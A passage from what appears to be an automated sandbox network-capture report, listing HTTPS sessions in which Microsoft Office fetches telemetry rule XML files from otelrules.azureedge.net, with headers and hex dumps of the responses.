                            2024-11-14 22:39:14 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            134192.168.2.45526113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:13 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:14 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:14 GMT
                            Content-Type: text/xml
                            Content-Length: 1388
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                            ETag: "0x8DC582BDBD9126E"
                            x-ms-request-id: 9bdc8c39-b01e-003d-1ed2-2cd32c000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223914Z-16547b76f7fmbrhqhC1DFWkds80000000m9g00000000hax6
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:14 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                            Session IDSource IPSource PortDestination IPDestination Port
                            135192.168.2.45526213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:13 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:14 UTC517INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:14 GMT
                            Content-Type: text/xml
                            Content-Length: 1415
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                            ETag: "0x8DC582BE7C66E85"
                            x-ms-request-id: 3018e20c-101e-008d-17d2-2c92e5000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223914Z-16547b76f7f7lhvnhC1DFWa2k00000000m80000000004cm2
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:14 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                            Session IDSource IPSource PortDestination IPDestination Port
                            136192.168.2.45526413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:14 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:14 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:14 GMT
                            Content-Type: text/xml
                            Content-Length: 1405
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                            ETag: "0x8DC582BE89A8F82"
                            x-ms-request-id: 835fac84-801e-002a-0b40-3631dc000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223914Z-1866b5c5fbbzcdbqhC1DFW3r3400000000f000000000863k
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:14 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                            Session IDSource IPSource PortDestination IPDestination Port
                            137192.168.2.45526513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:14 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:14 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:14 GMT
                            Content-Type: text/xml
                            Content-Length: 1368
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                            ETag: "0x8DC582BE51CE7B3"
                            x-ms-request-id: aa632173-901e-0029-20a2-34274a000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223914Z-164f84587bfdx9djhC1DFW956g00000000kg000000007u9p
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:14 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                            Session IDSource IPSource PortDestination IPDestination Port
                            138192.168.2.45526713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:14 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:14 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:14 GMT
                            Content-Type: text/xml
                            Content-Length: 1378
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                            ETag: "0x8DC582BE584C214"
                            x-ms-request-id: 16d49bac-201e-00aa-7816-323928000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223914Z-16547b76f7ftdm8dhC1DFWs13g0000000m9g0000000077tt
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:14 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            139192.168.2.45526613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:14 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:14 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:14 GMT
                            Content-Type: text/xml
                            Content-Length: 1415
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                            ETag: "0x8DC582BDCE9703A"
                            x-ms-request-id: cd727bf0-801e-007b-329c-36e7ab000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223914Z-16547b76f7fx6rhxhC1DFW76kg0000000m8g00000000dex8
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:14 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                            Session IDSource IPSource PortDestination IPDestination Port
                            140192.168.2.45526813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:14 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:14 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:14 GMT
                            Content-Type: text/xml
                            Content-Length: 1407
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                            ETag: "0x8DC582BE687B46A"
                            x-ms-request-id: 70ecc43c-201e-005d-53af-36afb3000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223914Z-16547b76f7fgvq8chC1DFWhd2w0000000120000000006xw2
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:14 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                            Session IDSource IPSource PortDestination IPDestination Port
                            141192.168.2.45526913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:14 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:15 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:14 GMT
                            Content-Type: text/xml
                            Content-Length: 1370
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                            ETag: "0x8DC582BDE62E0AB"
                            x-ms-request-id: 10ff9760-701e-0097-272a-36b8c1000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223914Z-1866b5c5fbbldb6rhC1DFW4bew00000000g000000000pddu
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:15 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                            Session IDSource IPSource PortDestination IPDestination Port
                            142192.168.2.45527013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:15 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:15 UTC517INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:15 GMT
                            Content-Type: text/xml
                            Content-Length: 1397
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                            ETag: "0x8DC582BE156D2EE"
                            x-ms-request-id: 524ac160-c01e-007a-69d2-2cb877000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223915Z-16547b76f7f76p6chC1DFWctqw0000000ma000000000s57p
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:15 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                            Session IDSource IPSource PortDestination IPDestination Port
                            143192.168.2.45527113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:15 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:15 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:15 GMT
                            Content-Type: text/xml
                            Content-Length: 1360
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                            ETag: "0x8DC582BEDC8193E"
                            x-ms-request-id: 95e3a472-701e-0050-58d2-2c6767000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223915Z-16547b76f7frbg6bhC1DFWr5400000000m2g00000000zsfn
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:15 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                            Session IDSource IPSource PortDestination IPDestination Port
                            144192.168.2.45527313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:15 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:15 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:15 GMT
                            Content-Type: text/xml
                            Content-Length: 1369
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                            ETag: "0x8DC582BE32FE1A2"
                            x-ms-request-id: 7e8866c9-d01e-0082-5907-36e489000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223915Z-1866b5c5fbb5hnj5hC1DFW18sc00000000e000000000cft1
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
